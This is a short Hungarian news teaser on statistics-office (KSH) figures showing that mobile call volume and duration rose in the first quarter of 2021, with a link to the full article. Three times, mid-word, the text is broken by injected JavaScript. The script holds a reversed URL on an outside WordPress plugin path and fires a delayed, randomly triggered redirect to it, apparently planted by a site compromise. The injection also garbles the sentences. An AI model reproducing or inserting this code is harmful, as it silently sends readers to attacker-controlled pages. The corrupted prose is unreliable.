A KSH honlapján olvasható elemzés szerint 2021 első három hónapjában a mobilhálózatból indítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott hívások száma 2,9 százalékkal, az időtartamuk 19 százalékkal nőtt az előző év azonos időszakához képest. A beszélgetések átlagos ideje 3,8 perc volt, ami a KSH szerint kimagasló, az egy mobil-előfizetésre jutó napi 6,4 perc beszélgetés pedig az elmúlt évek legmagasabb értéke. Ebben többek között a Covid-19-járvány miatt megváltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozott kapcsolattartási szokások is szerepet játszottak – jegyezték meg. A nemzetközi mobil hívások aránya korábban is elenyésző volt, de az idei év elejére toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovább csökkent a számuk és az időtartamuk is. A mobilhálózat adatforgalma 2021 első negyedévében 46 százalékkal meghaladta…
A cikk folytatódik: http://telekomesit.co.hu/cikk/id/ksh_fellendult_a_tavkozles_az_idei_elso_negyedevben_070721
- Hirdetés -